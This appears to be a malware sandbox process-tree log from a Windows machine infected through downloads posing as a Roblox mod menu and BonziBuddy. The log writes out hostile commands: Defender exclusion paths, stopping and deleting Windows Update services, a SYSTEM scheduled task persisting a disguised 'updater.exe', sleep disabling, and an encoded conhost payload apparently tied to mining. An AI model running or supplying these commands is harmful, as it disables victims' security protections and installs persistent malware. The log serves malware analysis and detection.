C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.85.24059052\1460196223" -childID 81 -isForBrowser -prefsHandle 9880 -prefMapHandle 7384 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aedc98cc-cab9-4b3a-8575-5a21286bbc50} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 7480 2df9e95ee58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.86.540366664\633649486" -childID 82 -isForBrowser -prefsHandle 6632 -prefMapHandle 9600 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {583a2c80-7ef8-47c0-9d3b-0f26bae2bb1d} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 9980 2dfa1186258 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.87.2144305479\776951883" -childID 83 -isForBrowser -prefsHandle 9648 -prefMapHandle 6720 -prefsLen 30133 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {903fbc2b-4bea-4855-ac66-bf1c424667be} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 7380 2df97070258 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.88.1382982295\786410714" -childID 84 -isForBrowser -prefsHandle 7896 -prefMapHandle 7120 -prefsLen 30335 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {91a4fb7a-4152-448d-958d-a2bb7038ba3f} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 7332 2dfa2181958 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.89.1889271691\314865691" -childID 85 -isForBrowser -prefsHandle 5724 -prefMapHandle 7520 -prefsLen 30335 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ea7e25ee-ade6-4ca1-8abe-9485ddddf58c} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 6528 2df8a462e58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.90.1078520211\316170476" -childID 86 -isForBrowser -prefsHandle 10372 -prefMapHandle 5432 -prefsLen 30335 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {51246d85-9874-4b3e-bcf7-41ba01085d72} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 7880 2df8a45ca58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.91.150142892\652089689" -childID 87 -isForBrowser -prefsHandle 3564 -prefMapHandle 4460 -prefsLen 30335 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {87074d98-d8b5-4ce7-b9ac-d8890487c1c0} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 9620 2df9b28a158 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.92.1507816467\1944258538" -childID 88 -isForBrowser -prefsHandle 8168 -prefMapHandle 10040 -prefsLen 30335 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {46406765-b46c-4bc2-9771-dbad572c10e0} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 10060 2df99ed9e58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.93.876701696\2055655855" -childID 89 -isForBrowser -prefsHandle 8264 -prefMapHandle 7916 -prefsLen 30335 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8498e49b-0ac4-4a0d-957b-faa6389eef64} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 10248 2df96c54858 tab4⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\9D62.exeC:\Users\Admin\AppData\Local\Temp\9D62.exe2⤵
- Executes dropped EXE
-
C:\Windows\system32\dllhost.exe"C:\Windows\system32\dllhost.exe"3⤵
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- outlook_office_path
- outlook_win_path
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 6963⤵
- Program crash
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }2⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe zuhwtyqtfkk2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe ozascextlcafxrlv 6E3sjfZq2rJQaxvLPmXgsH8HqLgRgcx0/LVDxBdghhCp2+hEkY7tykSHwITYgOlci3ytMC8bvXFdgLfubt31d00EGUNZvUBUebLdyQcn06lc9XyK+SQQg4bEvwPCdT2KYoSnyaznjkuq+t/WEmnCxetIZsxpO3p/zzwJI2q0v1rwbWjqgzbDndc3ETa3aKYf8EOpU9uqIUcKKIP5glSGIF5NNBIQIOxiwAszeRmTD+ssM2JwNB+ZJXRJvy123U7UEXSTx71FLoxpDYVaIMhOE++Mr3hazCz1q4t4s5o8+wL0kdpUV5VnrG7JmlnWotU5n89qBghGm+y6SMYnw4GovlYYIKPio/EJCBO4ISkMSM9oXvdK2xwDd7nOPHNI0ub2+9+yDpmbkJhXPRjLmh8EzH9no+cA8XXsDqc7l4Il6Q8HZCkxxQKp3X7QrvGtORgpsiUFRUsjuuqKF8OZDBQ643uz5XTg02QKOJfFPdU0JLRX+q6NZJdak+3EYZdI36Zgtv5L8IJAttmNYCJqIJTseVMH04bRJ5WBnXqRYehi2MM0O1YRQDI8kKVhBta2xSurnVpcEWelFYwmZuF8Vd3YhHb8yAOoY//KgjosTtbU5Co=2⤵
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Bon(1).zip\BonziBuddy432.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_Bon(1).zip\BonziBuddy432.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\BonziBuddy432\Runtimes\CheckRuntimes.bat" "3⤵
-
C:\Program Files (x86)\BonziBuddy432\Runtimes\MSAGENT.EXEMSAGENT.EXE4⤵
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Windows\msagent\AgentCtl.dll"5⤵
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Windows\msagent\AgentDPv.dll"5⤵
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Windows\msagent\mslwvtts.dll"5⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Windows\msagent\AgentDP2.dll"5⤵
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Windows\msagent\AgentMPx.dll"5⤵
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Windows\msagent\AgentSR.dll"5⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Windows\msagent\AgentPsh.dll"5⤵
- Loads dropped DLL
-
C:\Windows\msagent\AgentSvr.exe"C:\Windows\msagent\AgentSvr.exe" /regserver5⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\grpconv.exegrpconv.exe -o5⤵
-
C:\Program Files (x86)\BonziBuddy432\Runtimes\tv_enua.exetv_enua.exe4⤵
- Modifies Installed Components in the registry
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s C:\Windows\lhsp\tv\tv_enua.dll5⤵
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s C:\Windows\lhsp\tv\tvenuax.dll5⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\grpconv.exegrpconv.exe -o5⤵
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Roblox.Mod.Menu.zip\Roblox Mod Menu.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_Roblox.Mod.Menu.zip\Roblox Mod Menu.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Roblox Mod Menu\Roblox Mod Menu.exe"C:\Users\Admin\AppData\Roaming\Roblox Mod Menu\Roblox Mod Menu.exe"3⤵
- Modifies Installed Components in the registry
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\Roblox Mod Menu\Roblox Mod Menu.exe"C:\Users\Admin\AppData\Roaming\Roblox Mod Menu\Roblox Mod Menu.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\roblox-mod-menu-nativefier-050aef" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1504 --field-trial-handle=1716,i,1582917153729936331,7143427623394555561,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:24⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Roblox Mod Menu\Roblox Mod Menu.exe"C:\Users\Admin\AppData\Roaming\Roblox Mod Menu\Roblox Mod Menu.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\roblox-mod-menu-nativefier-050aef" --mojo-platform-channel-handle=2032 --field-trial-handle=1716,i,1582917153729936331,7143427623394555561,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:84⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Roblox Mod Menu\Roblox Mod Menu.exe"C:\Users\Admin\AppData\Roaming\Roblox Mod Menu\Roblox Mod Menu.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\roblox-mod-menu-nativefier-050aef" --app-user-model-id=roblox-mod-menu-nativefier-050aef --app-path="C:\Users\Admin\AppData\Roaming\Roblox Mod Menu\resources\app" --no-sandbox --no-zygote --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2408 --field-trial-handle=1716,i,1582917153729936331,7143427623394555561,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:14⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Roblox Mod Menu\Roblox Mod Menu.exe"C:\Users\Admin\AppData\Roaming\Roblox Mod Menu\Roblox Mod Menu.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\roblox-mod-menu-nativefier-050aef" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2532 --field-trial-handle=1716,i,1582917153729936331,7143427623394555561,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:24⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Roblox Mod Menu\Roblox Mod Menu.exe"C:\Users\Admin\AppData\Roaming\Roblox Mod Menu\Roblox Mod Menu.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\roblox-mod-menu-nativefier-050aef" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1912 --field-trial-handle=1716,i,1582917153729936331,7143427623394555561,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:24⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Roblox Mod Menu\Roblox Mod Menu.exe"C:\Users\Admin\AppData\Roaming\Roblox Mod Menu\Roblox Mod Menu.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\roblox-mod-menu-nativefier-050aef" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2756 --field-trial-handle=1716,i,1582917153729936331,7143427623394555561,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:24⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Roblox Mod Menu\Roblox Mod Menu.exe"C:\Users\Admin\AppData\Roaming\Roblox Mod Menu\Roblox Mod Menu.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\roblox-mod-menu-nativefier-050aef" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=3220 --field-trial-handle=1716,i,1582917153729936331,7143427623394555561,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:24⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Roblox Mod Menu\Roblox Mod Menu.exe"C:\Users\Admin\AppData\Roaming\Roblox Mod Menu\Roblox Mod Menu.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\roblox-mod-menu-nativefier-050aef" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2748 --field-trial-handle=1716,i,1582917153729936331,7143427623394555561,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:24⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Roblox Mod Menu\Roblox Mod Menu.exe"C:\Users\Admin\AppData\Roaming\Roblox Mod Menu\Roblox Mod Menu.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\roblox-mod-menu-nativefier-050aef" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2768 --field-trial-handle=1716,i,1582917153729936331,7143427623394555561,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:24⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Roblox Mod Menu\Roblox Mod Menu.exe"C:\Users\Admin\AppData\Roaming\Roblox Mod Menu\Roblox Mod Menu.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\roblox-mod-menu-nativefier-050aef" --app-user-model-id=roblox-mod-menu-nativefier-050aef --app-path="C:\Users\Admin\AppData\Roaming\Roblox Mod Menu\resources\app" --enable-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3436 --field-trial-handle=1716,i,1582917153729936331,7143427623394555561,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:14⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵
-
C:\Program Files (x86)\BonziBuddy432\BonziBDY_4.EXE"C:\Program Files (x86)\BonziBuddy432\BonziBDY_4.EXE"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵
- Checks processor information in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.0.609610290\577631051" -parentBuildID 20221007134813 -prefsHandle 1704 -prefMapHandle 1696 -prefsLen 20890 -prefMapSize 232711 -appDir "C:\Program Files\Mozilla Firefox\browser" - {50d2d6f9-fdce-4964-9e0d-4a4e4e854e0c} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 1784 1605100b458 gpu4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.1.741967801\2096378298" -parentBuildID 20221007134813 -prefsHandle 2140 -prefMapHandle 2136 -prefsLen 20890 -prefMapSize 232711 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {18e496dd-76b0-494e-811c-73a6acb4188d} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 2152 16050948758 socket4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.2.99992967\360297474" -childID 1 -isForBrowser -prefsHandle 2924 -prefMapHandle 2904 -prefsLen 21372 -prefMapSize 232711 -jsInitHandle 1388 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3a2ed4f9-9a6f-4b97-93a9-447fe38bef55} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 2928 1605484f258 tab4⤵
-
